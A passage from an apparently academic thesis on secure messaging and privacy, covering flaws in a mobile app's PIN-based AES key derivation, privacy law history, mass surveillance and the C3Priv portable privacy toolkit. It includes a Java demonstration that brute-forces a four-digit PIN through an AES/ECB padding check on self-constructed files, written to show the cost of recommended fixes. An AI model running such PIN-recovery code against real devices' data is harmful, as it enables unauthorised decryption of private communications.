derivation with HMAC-SHA1. A popular application of PBKDF2-HMAC-SHA1 is WPA/WPA2-PSK,
where the iteration count is 4096. To increase the cost of building pre-computed hash tables, it
would be advisable to use many more than the present 1024 iterations of HMAC-SHA1 to derive
the AES encryption key, especially when considering the level of security that the application
intends to achieve; WPA's 4096 iterations are themselves routinely brute-forced with GPUs today,
so that figure is a lower bound rather than a target.
The choice of salt should also be revised. The salt should be longer and generated randomly
(at least 16 bytes from a cryptographically secure random number generator), so that when
appended to the PIN it strengthens the passphrase. This is especially relevant if we consider that
PINs are usually very short, with a length between 4 and 6, and formed exclusively by digits. If
the appended salt is not long enough, hashing a list of brute-forced passwords can result in a
successful attack without much computing effort. The salt should also be different for each
device, so that each device requires its own set of rainbow tables to be computed for a successful
attack; with a fixed salt, one table serves every installation of the application.
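The key check of Section 3.5, together with the cost of the parameter changes recommended above, as an added example in Java; this is not the thesis's attack program nor the application's code. The derivation parameters are the ones the page reports, PBKDF2-HMAC-SHA1 with 1024 iterations producing a 128-bit AES key; the salt value, the four-digit PIN length, the stored plaintexts and the 200 000 iteration count used for comparison are assumptions made for this example. Rather than a pre-generated rainbow table, the candidate keys are derived on the fly, which for a fixed salt is the same computation the table would have stored.

```java
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;
import java.util.ArrayList;
import java.util.List;
import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;

// Added example: recovering a short PIN through the ECB padding check, and what the
// recommended parameter changes do to the attacker's cost.
public class PinRecoveryDemo {
    // Derivation as the page describes it: PBKDF2-HMAC-SHA1, 1024 iterations, 128-bit AES key.
    // The salt value, the PIN length and the plaintexts below are constructed for this example.
    static final byte[] WEAK_SALT = "app-salt".getBytes(StandardCharsets.US_ASCII);
    static final int WEAK_ITERATIONS = 1024;
    static final int STRONG_ITERATIONS = 200_000;   // assumption: a modern count, not the page's figure

    static SecretKeySpec deriveKey(String pin, byte[] salt, int iterations) throws Exception {
        SecretKeyFactory f = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1");
        byte[] raw = f.generateSecret(new PBEKeySpec(pin.toCharArray(), salt, iterations, 128)).getEncoded();
        return new SecretKeySpec(raw, "AES");
    }

    // What the application stores: AES/ECB/PKCS5Padding under the PIN-derived key.
    static byte[] encryptEcb(SecretKeySpec key, byte[] plaintext) throws Exception {
        Cipher c = Cipher.getInstance("AES/ECB/PKCS5Padding");
        c.init(Cipher.ENCRYPT_MODE, key);
        return c.doFinal(plaintext);
    }

    // The oracle of Section 3.5: a candidate key is rejected only if doFinal() throws.
    static boolean paddingValid(SecretKeySpec key, byte[] ciphertext) throws Exception {
        Cipher c = Cipher.getInstance("AES/ECB/PKCS5Padding");
        c.init(Cipher.DECRYPT_MODE, key);
        try {
            c.doFinal(ciphertext);
            return true;
        } catch (BadPaddingException e) {
            return false;
        }
    }

    // Try every PIN of the given length. A wrong key still passes the check on one file roughly
    // once in 256 times, so every stored file must pass; with two files the false-positive rate
    // drops to about one in 65 000, which is the "additional test" the attack needs.
    static List<String> recoverPin(byte[][] files, byte[] salt, int iterations, int pinLength) throws Exception {
        List<String> survivors = new ArrayList<>();
        String fmt = "%0" + pinLength + "d";
        for (int n = 0; n < Math.pow(10, pinLength); n++) {
            SecretKeySpec key = deriveKey(String.format(fmt, n), salt, iterations);
            boolean allValid = true;
            for (byte[] f : files) {
                if (!paddingValid(key, f)) { allValid = false; break; }
            }
            if (allValid) survivors.add(String.format(fmt, n));
        }
        return survivors;
    }

    public static void main(String[] args) throws Exception {
        String secretPin = "4321";
        SecretKeySpec weakKey = deriveKey(secretPin, WEAK_SALT, WEAK_ITERATIONS);
        byte[][] files = {   // constructed stand-ins for the encrypted IV files on the SD card
            encryptEcb(weakKey, "IV for contact A: 0123456789abcdef".getBytes(StandardCharsets.US_ASCII)),
            encryptEcb(weakKey, "IV for contact B: fedcba9876543210".getBytes(StandardCharsets.US_ASCII)),
        };

        long t0 = System.nanoTime();
        List<String> found = recoverPin(files, WEAK_SALT, WEAK_ITERATIONS, secretPin.length());
        long weakMs = (System.nanoTime() - t0) / 1_000_000;
        System.out.println("PIN candidates surviving both files: " + found + " (" + weakMs + " ms for 10^4 PINs)");

        // Cost of the fixes: a higher iteration count multiplies every guess, and a random
        // per-device salt means the table of keys cannot be computed once and reused.
        byte[] deviceSalt = new byte[16];
        new SecureRandom().nextBytes(deviceSalt);
        t0 = System.nanoTime();
        deriveKey(secretPin, deviceSalt, STRONG_ITERATIONS);
        long oneGuessMs = (System.nanoTime() - t0) / 1_000_000;
        System.out.println("one guess at " + STRONG_ITERATIONS + " iterations: " + oneGuessMs
                + " ms, so about " + oneGuessMs * 10_000 / 1000 + " s per device for 4-digit PINs");
    }
}
```

The second half of the output makes the limits of the two recommendations visible. A random per-device salt stops the key table from being computed once and reused for every device, and a high iteration count multiplies the cost of every guess, but a four-digit PIN has only 10 000 candidates, so an attacker holding the device's files still recovers it in minutes rather than seconds. Neither change makes the PIN itself safe; for that, a longer secret, or a key held in hardware that rate-limits PIN attempts, is needed.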
The operation mode for AES requires additional consideration, since ECB reveals whether two
plaintext blocks are equal and provides no integrity. A mode that turns AES into a stream cipher
(for example CTR), or a dedicated stream cipher, removes the padding and with it the padding
oracle, but unauthenticated ciphertext remains malleable in any mode. The ciphertext should
therefore be authenticated, either with an authenticated mode such as AES-GCM or with a MAC
computed over the ciphertext (encrypt-then-MAC), and the authentication tag checked before any
decryption takes place, so that a tampered message is rejected before its padding, or its contents,
are ever examined.
To ensure the correctness of the code in such a critical application, the code should be reviewed
and audited prior to launching the application commercially. The potential buyer should also
consider creating a set of standards that the developers must follow, to ensure that their product
has an adequate level of quality and can work with the required level of security.
Chapter 4
Privacy in hostile environments
Throughout this work, we will define the right to privacy as the “right to keep a domain around
us, which includes all those things that are part of us, such as our body, home, property, thoughts,
feelings, secrets and identity. The right to privacy gives us the ability to choose which parts in
this domain can be accessed by others, and to control the extent, manner and timing of the use
of those parts we choose to disclose.”[52] In the present chapter, we will review the evolution of
this concept from the late 19th century to the present day, following court cases that challenged
the legality of certain methods of information gathering while pursuing an elusive definition of
the right to privacy. We will show how such cases are closely related to the use of new technology,
and how the inability to understand the growing complexity of that technology hinders the ability
of the law to protect citizens from abuse.
4.1 The right to be let alone
The history of privacy as a human right is intimately connected with the history of technology.
Before the advent of the printing press, breaches of privacy were very limited, since news did not
propagate further than what was strictly necessary, and records, official and otherwise, were rare
and hard to access.
The first publication to advocate privacy as a right was written by Samuel Warren and Louis
Brandeis, and published in 1890. Their main concern was that the laws in place did not account
for technological advancements such as instantaneous photography, and that those advancements,
coupled with the widespread circulation of newspapers, had opened a new market for “idle
gossip, which can only be procured by intrusion upon the domestic circle”. In their article they
examine concepts already present in the law, such as libel, slander, breach of confidence and
intellectual property, only to conclude that they do not adequately cover the harm that comes to
the individual when facts of his private sphere come under the scrutiny of the public eye. They go
on to argue that there was a principle in the existing law that afforded what they called the “right
to be let alone”. [56]
In 1928, Brandeis was a justice of the Supreme Court and wrote a dissenting opinion in
Olmstead v. United States[4], the first case in which the Court considered evidence obtained by
wiretapping. Although the defendant, accused of running a huge bootlegging network, invoked
the 4th and 5th Amendments1, the majority of the Court held that telephone conversations were
not comparable to sealed mail and that, since the taps had been placed on the lines in the streets
near the houses, without entering the defendants' premises, no search or seizure had taken place
under the existing rules on the gathering of evidence. Brandeis argued that the 4th and 5th
Amendments had been written to protect citizens from force and violence, which were at the time
the only means by which the government could compel self-incrimination, but that technological
advances had given the government subtler methods that nevertheless endangered the same
rights. He asks whether the Constitution grants any protection against such abuses and concludes
that it does. He reasons that the 4th and 5th Amendments are broad in scope, since the
Constitution aims to protect Americans from intrusion of the Government into their private lives,
and that to protect the right to be let alone, “every unjustifiable intrusion by the government
upon the privacy of the individual, whatever the means employed, must be deemed a violation
of the Fourth Amendment”. He goes on to point out that the use of evidence obtained illegally
(wiretapping was a crime under the law of the State of Washington), and through the infringement
of such a fundamental right, was a violation of the 5th Amendment.
The ruling in Olmstead v. United States was eventually overturned by another case, Katz v.
United States[3], in 1967. This case established that an intangible intrusion with the aid of
technology, such as wiretapping, constitutes a search, and as such is covered by the rules for
reasonable search and seizure. It also extended the scope of the 4th Amendment to all the places
where an individual has a “reasonable expectation of privacy”. Justice Harlan gave a concurring
opinion in which he established what became known as Harlan's test. This test holds that there
is a right to privacy whenever the individual exhibits an expectation of privacy, and society
recognizes that expectation of privacy to be reasonable.
In “First Principles of Communications Privacy”, author Susan Freiwald states her belief
that “difficulty with the reasonable expectation of privacy test has led courts to avoid using it
to resolve the constitutional status of modern communications technologies. But the answer
cannot be to withhold constitutional protection from electronic communications, as courts do
when they fail to act. (...) If courts do not establish constitutional protections for the electronic
communications that are now central to our lives and work, then we will have accorded law
enforcement surveillance powers of Orwellian magnitude.”[49]
1The 4th Amendment to the United States Constitution protects the right to be secure against unreasonable
searches and seizures. The 5th Amendment protects, among others, the right to due process. A process is not
due process if it conflicts with any of the provisions of the Constitution, or if it “offends some principle of justice so
rooted in the traditions and conscience of our people as to be ranked as fundamental”. [Snyder v. Massachusetts,
291 U.S. 97, 105 (1934), https://supreme.justia.com/cases/federal/us/291/97/case.html#105]
4.2 Mass surveillance
The presumption of innocence is a right protected by the Universal Declaration of Human Rights
(Article 11) and, in Europe, by the Convention for the Protection of Human Rights and
Fundamental Freedoms of the Council of Europe (Article 6). Formally, presumption of innocence
means that the burden of proof is on the accuser, not on the defendant. At this point, the right to
presumption of innocence is being infringed upon in important ways, mostly due to mass
surveillance and the illegal seizure of personal information.
If we look hard enough at an individual citizen, it is very likely that he has broken the law in
some way, knowingly or unknowingly, but not with criminal intent. In most countries where the
presumption of innocence is considered a right, prosecuting a citizen requires a strong suspicion,
followed by the gathering of proof. Depending on the nature of the proof and the strength of the
accusation, a judge may have to authorize such gathering. In countries with mass surveillance,
however, every citizen is treated as a possible suspect, and evidence collection is permanent and
unfiltered. It is possible for the authorities in such a country to single out an individual and
search his records for activity that can be used to initiate prosecution. The analysis of this
information can even be automated, so that a prosecution may start without human intervention
or judgment.
Although frowned upon in liberal democracies, mechanisms of mass surveillance have been
tolerated, and sometimes accepted, by the public as a necessary evil. However, no western
government has been able to produce evidence of the necessity of such programs, despite the
pressure to do so. The popular claim recently made by the USA that 54 terrorist attacks had
been stopped by their contested mass surveillance program was found untrue by two independent
White House reviews of the relevant classified data.[45][31]
Paired with this fact, the disclosure of classified information about secret programs developed
in the USA and Europe has shown the depth to which innocent citizens' lives are being scrutinized
and intruded upon by these mechanisms of bulk data collection.
The ubiquity of electronic personal devices, many of them with significant data storage
capacity, adds to the problem, since the amount of personal and private information that can
currently be seized in the event of a legitimate body search is enormous. Because these devices
have only recently become widely available, their seizure, together with the data they contain,
is not bounded by law. This allows the authorities to apprehend cellphones, hand-held GPS
units, digital storage devices, and cards containing biometric data. The possibilities created by
the massive collection of this sort of data are very relevant to the health of democracy in western
states, but they become particularly dangerous if a government or a law enforcement agency
chooses to abandon the principles that it is expected to follow, a situation not altogether
uncommon in very recent or unstable democracies, in dictatorships or in police states.
4.3 Privacy and technology
Throughout the history of privacy, two main facts come to light: one is that there is an ever-present
temptation for political, economic or military powers to exploit the lack of privacy regulations for
profit or for legal advantage; the other is that a lack of regulations protecting privacy is always
present when new technologies emerge.
In the last years of the past century and through the past decade, technology surfaced and
became widely available at a pace that had not been seen before. Internet access has led a
significant part of the population to rely heavily on online services, placing a huge amount of
trust in the availability and integrity of those services and their underlying technology.
Due both to the popularity of and the ubiquitous need for Internet access, a vast array of
terminals has been developed, as diverse as smartphones, tablets or wristwatches. In general, they
are so complex that their core is opaque to most users, even to those who know one of their many
components in detail.
Although they could have done otherwise, and perhaps to their own benefit, companies and
brands have made no effort to create and adopt clear standards, or to educate users. Vague
concepts such as “Cloud Services” or the “Internet of Things” lead the public to infer, wrongly,
that the complex, intermediary-ridden network their data and metadata have to cross is a simple,
vague and secure place that they need not know or care about. With no incentive to learn and
no perception of the growing gap between user and device, the population in general is acquiring
no significant knowledge of the inner workings of the services, the hardware they use, or the
channels they use to reach them.
To counter this, there has to be a significant investment in educating users, and in establishing
rules for transparency in the design of software and hardware that needs to be trusted. New
technologies will have to be created according to a principle of “privacy by design”.
Chapter 5
Easy to use Privacy: C3Priv
As public awareness of online privacy and data security increases, there is also an increasing
need to provide adequate tools for enhancing safety in the use of networks and terminals. To
address this need, a project was developed in the context of the present work, in conjunction
with the C3P from Universidade do Porto (UP) and the Comissão Nacional de Protecção de
Dados (CNPD). The project, named C3Priv, aims to develop a tool that gives users back the
ability to take control over their own privacy. In the following chapter we describe the challenges
faced while designing a solution, and how we overcame them.
5.1 Guiding premises
C3Priv starts with the premise that the biggest risks for users arise from the lack of control they
have over the software they use. Frequently browsers, websites and applications store personal
data and sensitive information without the awareness or permission of the user. When this occurs
in an uncontrolled environment the risk multiplies, and it is almost certain that privacy - and
even safety - of the user is compromised.
Our goal is to allow users to reduce their “online footprint”, giving them a safer online
experience independently of their computer know-how and their ability to correctly configure
complex software. Organizations and projects like the Electronic Frontier Foundation[14], the
Open Rights Group[5], the American Civil Liberties Union[42] or the TOR Project[36] exist, but
their aim is directed at educating users, at appealing to major online websites and companies to
become accountable and ethical in their data collection, at covering anonymity needs, or at pushing
for stricter rules to regulate abusive data collection. Unlike these projects, C3Priv starts from
the conservative view that every computer used and every site visited is hostile, unless the user
explicitly says otherwise. We shift the focus to the user, giving him the responsibility and the
choice to protect himself.
In order to ensure that users will adhere to this new paradigm of taking control over their
own “online footprint”, any solution has to do more than give them the tools to keep themselves
safe. We therefore opted for a design directed towards solving the users' needs, offering them
applications that are easy to use, with a gentle learning curve, and that ultimately address their
day-to-day needs with no additional burden.
Ultimately, the purpose of C3Priv is to return control to the user, allowing him to choose
what he sees, when he sees it, what he keeps for the future, who can track him, and for how long.
5.2 Privacy By Default
Observing users' needs, a common challenge seems to be keeping files and configurations
synchronized between computers. Between the workplace and home, users often need to copy
files and bookmarks to keep them updated, or to write down passwords in order to use the same
services from everywhere. These procedures are both cumbersome and risky. Recent files may be
overwritten by older versions, and passwords and documents may be misplaced, lost or even
captured by a hostile party.
Although there is a growing concern among the public and the media over security topics, close
observation also shows that a large base of concerned users is not computer savvy, and is unable
both to choose appropriate software and to configure it correctly on their own. Software that is
wrongly configured, or obtained online from dubious sources, can be as dangerous as having no
protection at all, or more so.
From these observations, it becomes clear that a useful solution has to integrate software equal
or very similar to the one the user already works with, in a format that he can carry with him.
This solution must also be bundled in a way that allows for easy deployment, and must be usable
successfully with default configurations by users with very little computer experience.
5.3 Recognizing Limits
When building a solution that is, ultimately, a “best effort” approach to protecting users, it is
crucial to identify threats, and to establish the limits beyond which we cannot counteract them.
Without considering the good sense and the computer literacy of the user, the protection we
can afford will ultimately depend on the scope and the power of the intercepting party, which we
will call the adversary.
It is a well known rule of cybersecurity that no system is secure unless it is offline and
physically isolated. To us, this means there are concerns we must choose to leave aside. Chief
among them is the possibility of the physical capture of data or storage devices, by legal means
or by force, as well as the coercion of the user into revealing whichever data he aims to keep secret.
At best, this could be approached by building a system that supports plausible deniability. However,
besides the added complexity of the design constraints, such a mechanism could be a hindrance to
the common user unless done seamlessly, and is likely beyond the needs of the target audience.
When talking about securing data that traverses a network, it is also important to establish
who owns that network, and the level of control the owners have over it. An adversary that owns
both ends, or a sufficiently large number of nodes in the network, will be able to time connections
and gather large amounts of information. This may allow him to correlate separate communications,
possibly identifying users and patterns of behavior, and to link together different sessions of the
same user, both in the same and in different services. Among many other things, with control of
intermediate nodes the adversary can manipulate or redirect the connection, conducting effective
phishing or man-in-the-middle attacks. This situation becomes especially severe if the adversary
also controls a relevant certificate authority, allowing him to create false secure connections and
to easily hijack secure communications. Ultimately, a powerful adversary could in extreme cases
block all HTTPS traffic, so that the communications made could be intercepted unencrypted, or
even block all communication. Actual examples of such occurrences were seen in countries such
as Syria, Iran and China, where the victims of the attacks ranged from activists to journalists to
civilians opposed to the regime. For the time being, and to limit the complexity of the project,
these groups of users will be left out of our target public.
5.4 Proposed Solution
With these considerations in mind, we are able to narrow down a group of users that is more
likely to benefit from a solution such as C3Priv. These are users that have little computer literacy
but use computers and the Internet on a day-to-day basis. To give these users a Swiss-army-knife
of applications they can recognize and actively use both at home and in less secure environments,
PortableApps was chosen as the base for the software bundle. As stated on their website,
PortableApps is a fully open-source and free platform that works from any portable storage
device, and can be installed and run locally.
With millions of users worldwide, and online since 2004, PortableApps has established itself
as a trusted platform, and has a large collection of open-source, freeware and commercial software
easily available. PortableApps is highly customizable and flexible, allowing the user to pick from
a vast array of portable applications in a built-in store, which can be regularly updated with no
more than a click. A set of customizable menus can be organized in the most convenient way,
and the application can be configured to run selected portable apps every time the menu opens.
Portable applications have the functionality of the installed versions, but were adapted so
that all files and data needed by the program are kept in sub-folders of the program's main
folder. The PortableApps software can be installed on a portable device, such as a USB pen-drive,
together with the selected applications. When the user plugs the pen-drive into any Personal
Computer (PC), he can use those applications without having to install them locally.
Figure 5.1: PortableApps menu
All the files are saved to the drive, instead of the PC. Therefore, the user always has with
him the files he needs, as well as his usual programs, configured according to his preferences and
needs. From a privacy-preserving point of view, this solution has the significant advantage of
reducing to the minimum necessary the information left on the PC used, reducing the risk of the
user inadvertently leaving private data in the wrong hands.
Together with this software, the C3Priv bundle also includes two browsers, one with
add-ons specifically chosen for enhanced privacy and security, and another, the TOR Project's
browser bundle, which addresses user anonymity and is left unaltered. Encryption software is
also included, together with an encrypted folder that can be used as a “safe” folder for important
files. The full contents of the C3Priv bundle, already installed on a USB pen-drive, can be
seen below.
Figure 5.2: Contents of a USB pen-drive with C3Priv already installed
5.5 Advantages of Open Source
Besides PortableApps itself being open source, all programs selected to be in the C3Priv bundle
by default are open source.
Compared to freeware or paid proprietary software, whose source code is not disclosed, the
code of open-source software is easily available, and can be read and analyzed by any user who
wishes to do so. Due to the popularity and widespread use of these particular applications, the
source code is reviewed by a large number of people from all over the world. This gives us
greater trust in the software we include in the bundle, since it is unlikely that any purposely
placed exploit or “back-door” would pass unnoticed by so many independent and diversely
motivated users. Open source is a precondition for such review rather than a guarantee of it:
the review only protects users if someone actually performs it, and the Heartbleed bug
(CVE-2014-0160) went unnoticed in the widely used OpenSSL library for about two years. The
origin of each program and the integrity of the packages placed in the bundle therefore still
deserve explicit verification.
5.6 Selected Applications
C3Priv contains a small set of applications selected for their usefulness to the majority of our
target users. This includes programs such as office software to edit documents and spreadsheets,
an audio player, an anti-virus, an application to compress and decompress files, an image editor,
an e-mail client, programs for secure remote access, an Instant Messaging client, and a browser.
Users can add software they find useful through the PortableApps available software menu,
including proprietary software, if they so choose. A full list of the software included is given in
Annex A.
5.7 Selected Browser Add-ons
Add-ons are small pieces of optional software that add to a program's functionality. To address
privacy and online safety concerns, we included in the Firefox browser present in C3Priv a set of
relevant add-ons, already configured to offer maximum protection. This includes a vast array of
add-ons that range from blocking online tracking, cookies, dangerous scripts, Flash animations,
pop-ups or invasive advertisement, to verifying a secure connection or a website's reputation. A
full list of the add-ons included is given in Annex B.
5.8 Observations and Results
The first public release of C3Priv happened on the 11th of February 2014, in celebration of
Safer Internet Day, through the CNPD website[11]. Since then, it has been available for
download on its own webpage[9]. It received a significant amount of attention from the press, and
the C3Priv bundle available online had over 8,000 downloads during the first month. We retained
some of the downloads' metadata, in order to map the geographical areas that showed interest in
C3Priv. As the charts displayed below show, the vast majority of downloads were made from
Portugal. After Portugal, the largest number of downloads in Europe came from France and
from the United Kingdom. Some interesting results show a large number of downloads in areas
such as Brazil (in particular in the north and on the western frontier with Bolivia), Morocco,
Angola, and South Korea.
The large number of downloads from Brazil and Angola may be a result of the shared cultural
and linguistic legacy, and possibly of the significant presence of Portuguese citizens living in
those countries. Downloads from South Korea and Morocco are, however, harder to explain, and
may be related to the awareness about privacy and freedom of speech that the recent political
turmoil both in North African countries and in North Korea has created. Unfortunately, there
is not enough data to allow us to draw further conclusions. Mechanisms for retrieving more
information can be found in the proposals for future work.
Figure 5.3: Volume of C3Priv downloads from February 2014 to October 2014
Figure 5.4: C3Priv download distribution globally
Figure 5.5: C3Priv download distribution in Europe
5.9 Future
During the creation of C3Priv and the analysis of results, we perceived a large space for
improvement in the existing technologies that address user privacy and security. The interest
demonstrated by the public in our project, both through the press and through the individual
C3Priv downloads, leads us to believe that the development and evolution of C3Priv must
continue. The lines of work that appear particularly relevant for the time being are explained
below.
5.9.1 Creating an indistinguishable online identity
Research has shown that the use of specific options to avoid online tracking and protect user
data may actually make the user more visible to an observer looking for distinguishing profiles.
In fact, to be anonymous in a crowd, the user has to mingle with it, becoming unidentifiable
within that anonymity set. This can only be done when a significant number of individuals in
the crowd have very similar profiles. To this end, using a large number of security plug-ins, or
disabling common features of the browser, such as Javascript or Flash, can have a detrimental
effect for the user.[53][48]
Although C3Priv could create an anonymity set on its own, making all of its users indistin-
guishable from each other, our users are not numerous enough to achieve that at this point.
Therefore, a useful approach would be to keep updated records of the most common browser
settings, and apply them to the C3Priv browser automatically. Since this extra anonymity could
come at the cost of a lower level of privacy or protection, each configuration would have to be
carefully evaluated to assess its impact. A possible solution to this dilemma would be to provide
different bundles, allowing the user to choose the one he finds most adequate to address his needs.
These bundles should then be tested for uniqueness using tools such as Panopticlick, a website
created by the Electronic Frontier Foundation to evaluate how unique a given browser fingerprint
is.[28]
5.9.2 Surveying users needs
To establish the needs and the level of satisfaction users have with C3Priv, a small survey could
be done on the website, or a feedback tool could be included in the software. This could allow
the users to express their preferences about the usability of C3Priv, the applications they wish to
see included in future editions, and possible problems and bugs they may encounter during use.
Chapter 6
Conclusion
During this thesis we examined several scenarios where privacy, anonymity or secrecy are needed
in communications but difficult to achieve. We did research on existing solutions to mitigate the
difficulty in controlling and securing a working environment for entities with different needs and
motivations, from the exchange of classified information by government officials, to the need for
privacy of the common citizen.
In the realm of classified communications, together with the C3P team, we examined a
commercially available mobile application for design flaws. We described the flaws found
and detailed how they could be exploited, showing that the communications done through the
application were not secure. We implemented software to exploit one of those design flaws.
However, due to problems with the initial solution of adapting an existing program, we had
to develop new software for our distributed worker nodes. The problems found delayed the
implementation of the software, resulting in an unstable program that still needs debugging and
testing before it can produce reliable results.
The generalization of our observations about the examined application to other similar apps
is limited by the lack of an exhaustive analysis of commercial software for secure communications.
However, the fact that such critical design flaws were found in an application meant for secure
communications at the highest level makes us reasonably suspicious that applications with the
same, or higher, level of oversight may be available commercially, especially among those marketed
for secure communications for businesses or individuals. Our findings prove alarming enough to
instigate more caution and stricter rules in the selection of software for secure communications,
and underline the need for rigorous security audits when high levels of security are required.
In the field of online privacy, the focus of this work was the everyday activity of a common
individual. We started by studying the evolution of the concept of privacy and the way it has
been infringed upon with the aid of new technology, from the dissemination of street photography
to bulk data collection. We have shown that the discussion on the concept of privacy and the
need to frame it in legal terms has remained a subject of debate to the present day. With courts
avoiding the application of Harlan's test, both due to the difficulty of assessing the public's
expectations towards privacy, and to the complexity of the technology involved in the current
methods of information gathering, we concluded that there is an urgent need to provide a clear
and resilient definition of privacy, together with a set of rules and guidelines that can effectively
protect citizens from the threats of existing and future technology.[49]
In parallel with the struggle to create mechanisms to protect citizens, we searched for a solution
for the lack of control that users experience over their online footprint. We developed C3Priv, a
solution that could return a measure of control to the user, by allowing him to use computers that
he does not trust without leaving any significant information behind. The tool includes a version
of the popular Firefox browser, customized to minimize as much as possible the information that
is collected by websites during regular Internet use. By tracking the number of downloads of
C3Priv and their distribution throughout the globe, we were able to verify that the interest in
the tool spreads beyond Portuguese-speaking countries, indicating that internationalizing the tool
may be a possible direction for future development. Other future improvements can be made as
the weaknesses identified in the tool are addressed and fixed.
In the research done for the present work, it became evident that the average computer or
smartphone user, or the average netizen, is vulnerable to the technology he does not understand.
Because users in this group are very numerous, and the most vulnerable to scams and online
attacks, we believe that the most important achievement of this work was the creation of a tool
that takes the burden of correct configuration and deep technological knowledge off the user.
Although there is ample room for improvement, C3Priv is a unique tool, and it is ready to fulfill
its purpose, contributing towards a user experience that is safe by default.
Annex A - Portable Applications
7-Zip This application is a popular file compressor. It allows the creation of archives with the
following compression formats: 7z, ZIP, GZIP, BZIP2, TAR, RAR, among others.[1]
ClamWin This application is a free anti-virus for Microsoft Windows. It boasts high levels of
detection of viruses and spyware and is constantly being updated. The portable version does
not allow for automatic updates, and file verification must be made manually by the user.[10]
Evince Evince is a PDF, DJVU, TIFF and DVI reader. More information at: [15]
GIMP The GNU Image Manipulation Program is a complete image editor. It contains all the
basic functionality of an image editor and offers advanced users tools for professional photo
editing or illustration creation.[21]
KeePass This application is a password manager that allows the user to store all his passwords
securely. The passwords are retrieved from and stored in a secure database. The user
only needs to remember one password, which works as a master key allowing access
to the full database.[22]
KiTTY This is a telnet and SSH client for Windows that allows secure connections to
remote systems.[23]
LibreOffice This is an office suite of programs with full compatibility with the Microsoft
products and others (Lotus, WordPerfect and similar apps).[24]
MicroSIP This application allows the user to make high-quality VoIP calls using the SIP
protocol.[25]
Mozilla Firefox This is one of the best known web browsers, boasting several security
enhancements that protect the privacy of the users. The portable version does not leave
any personal information on the computer that is used, allowing complete privacy.[16]
Mozilla Thunderbird The Mozilla Thunderbird application is an electronic mail client, secure
and easy to use. It supports IMAP/POP and RSS. The portable version leaves no trace on
the computer where it is used, allowing the transportation of and secure access to e-mails
and contacts.[34]
OpenVPN This application allows the creation of connections through encrypted tunnels,
allowing access to remote resources in a secure manner.[27]
Pidgin Portable This is an application that allows the exchange of instant messages. It has
support for the protocols used by AOL, ICQ, MSN, Yahoo, among others. All the
settings and contacts are private and no information is retained on the used machine.
The available plugins can be easily added to allow for message encryption.[30]
Songbird This is an audio player with MP3, FLAC, Vorbis, and WMA support.[33]
VLC This is a multimedia player that supports several video and audio formats. [38]
WinSCP This application is an SFTP and FTP client for Windows and allows for a secure way
to copy files to/from a remote location to the local machine.[40]
WinWGET This application is a download manager based on wget.[41]
Tor Bundle This package includes a modified Firefox version to use with the Tor network,
allowing anonymous access to the Internet.[36]
Annex B - Firefox Add-Ons
Adblock Plus Adblock Plus uses several filters to remove online advertising and block sites
containing malware. [6]
BetterPrivacy Protects the user against "super" cookies. This new generation of cookies allows
the profiling of the user's behavior on the web. This information is easily accessible by
marketing companies. This add-on was created to alert the users to the hidden objects
that never expire, and allow for an easier visualization and management of them, as the
automatic methods of control are not reliable.[7]
Bloody Vikings! This add-on simplifies the use of temporary e-mail addresses. It allows for
the user to remain anonymous and at the same time protects his real address from SPAM.
More information available at [8]
Do Not Track Me Every time we browse on the web, companies, marketing agents and social
networks collect information about the users. Everything one reads, clicks and buys is
being recorded and stored. The DoNotTrackMe plugin stops this unwanted profiling. [12]
DuckDuckGo Plus DuckDuckGo can be added as the default search engine for the address
and search bar.[13]
Flagfox Among other advanced functionality, Flagfox shows on the address bar the flag
corresponding to the country that is currently serving the webpage.[17]
Flashblock Flashblock blocks all the Flash content in a webpage and adds a button that gives
the user the option to download and run that content. It blocks content from Macromedia
Flash, Macromedia Shockwave and Macromedia Authorware.[18]
Force TLS This add-on replaces insecure HTTP connections with HTTPS (secure HTTP)
whenever a server supports it.[19]
Ghostery This add-on detects trackers, beacons and other tools used by publicity and marketing
companies to follow the behavior of users online, allowing the user to deactivate them.[20]
NoScript Security Suite This suite ensures that JavaScript, Java and other scripts and
programs are only executed if they come from safe domains, chosen by the user. This
allows for protection against some common web attacks.[26]
Perspectives This add-on creates an identity database, using information gathered from
different places on the Internet. Every time a user accesses a secure site, this add-on
compares the site's certificate with the information it has collected in its database, alerting
if any discrepancy is detected.[29]
Self Destructing Cookies This add-on deletes the cookies and local cache as soon as the browser
tab that created them is closed.[32]
Toggle Javascript This add-on adds a button to the tool bar that allows the user to switch
Javascript on/off in a quick manner.[35]
Web Of Trust This add-on shows a site's reputation by displaying a traffic light next to each
result from a search engine. The symbol is also visible in links from sites like Facebook,
Twitter, Gmail, Wikipedia, among others. A green light means that users classified the
site as trustworthy; a yellow or red one alerts for potential danger.[39]
Acronyms
3G Third Generation
4G Fourth Generation
GSM Global System for Mobile Communications
SMS Short Message System
AP Access Point
SD Secure Digital
ISP Internet Service Provider
RFC Request For Comments
PRF Pseudorandom Function
ASCII American Standard Code for Information Interchange
CPU Central Processing Unit
SSH Secure Shell
PC Personal Computer
USB Universal Serial Bus
HTTP Hypertext Transfer Protocol
IP Internet Protocol
OS Operating System
AES Advanced Encryption Standard
CCMP Counter Mode Cipher Block Chaining Message Authentication Code Protocol
ECB Electronic Codebook
HMAC Hash-based Message Authentication Code
IV Initialization Vector
PBKDF2 Password-Based Key Derivation Function 2
PIN Personal Identification Number
PKCS Public Key Cryptography Standard
PSK Pre-Shared Key
SHA Secure Hash Algorithm
SHA1 Secure Hash Algorithm 1
SHA3 Secure Hash Algorithm 3
SSID Service Set Identifier
TKIP Temporal Key Integrity Protocol
WPA Wireless Protected Access
WPA1 Wireless Protected Access 1
WPA2 Wireless Protected Access 2
WEP Wired Equivalent Privacy
RADIUS Remote Authentication Dial In User Service
PMK Pairwise Master Key
USA United States of America
US United States
UP Universidade do Porto
CNPD Comissão Nacional de Protecção de Dados
C3P Centro de Competências em Cibersegurança e Privacidade
NIST National Institute of Standards and Technology
NSA National Security Agency
Bibliography
[1] 7-Zip. Online. URL http://www.7-zip.org/. Last accessed: January 20, 2015.
[2] Java Platform, Standard Edition 7 - API Specification - Class Cipher. Online. URL http://docs.oracle.com/javase/7/docs/api/javax/crypto/Cipher.html. Last accessed: January 20, 2015.
[3] Katz v. United States, 389 U.S. 347, (9th Cir. 1967). Online. URL https://supreme.justia.com/cases/federal/us/389/347/case.html. Last accessed: January 20, 2015.
